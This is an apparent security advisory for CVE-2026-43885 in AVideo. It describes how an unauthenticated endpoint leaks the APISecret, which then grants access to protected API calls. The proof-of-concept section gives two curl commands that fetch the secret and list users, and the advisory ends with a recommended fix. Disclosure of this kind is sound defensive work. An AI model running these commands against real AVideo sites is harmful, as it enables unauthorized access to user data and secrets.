CVE-2026-43885
EPSS 0.07%AVideo Vulnerable to Exposure of Sensitive Information to an Unauthorized Actor and Missing Authorization
Description
### Summary An unauthenticated user can read `APISecret` from `objects/plugins.json.php` and use it to call protected API endpoints (e.g. `users_list`) without logging in. ### Details `objects/plugins.json.php` is public and still exposes plugin `object_data` containing `APISecret`. That secret is accepted by `plugin/API/get.json.php` as authentication. ### PoC 1. Get plugin config (contains `APISecret`): ```bash curl 'http://<host>/objects/plugins.json.php' ``` <img width="879" height="94" alt="image" src="https://github.com/user-attachments/assets/027073fc-dccd-4e1d-8450-ad12345e88eb" /> 2. Copy APISecret from response, then call API directly: ```bash curl --get 'http://<host>/plugin/API/get.json.php' \ --data-urlencode 'APIName=users_list' \ --data-urlencode 'APISecret=<APISecret>' \ --data-urlencode 'rowCount=3' \ --data-urlencode 'current=1' ``` <img width="1719" height="170" alt="image" src="https://github.com/user-attachments/assets/edd629be-e75c-40a2-a52f-2f2e6da99b79" /> ### Impact Unauthenticated disclosure of sensitive config (APISecret) leading to unauthorized access to protected API data. ### Recommended fix Requiring admin auth for full plugin inventory/config endpoint.
Affected packages (1)
- Packagist/wwbn/avideofrom 0, <= 29.0
CVSS scores
| Source | Version | Severity | Vector |
|---|---|---|---|
| osv | CVSS 4.0 | — | CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P |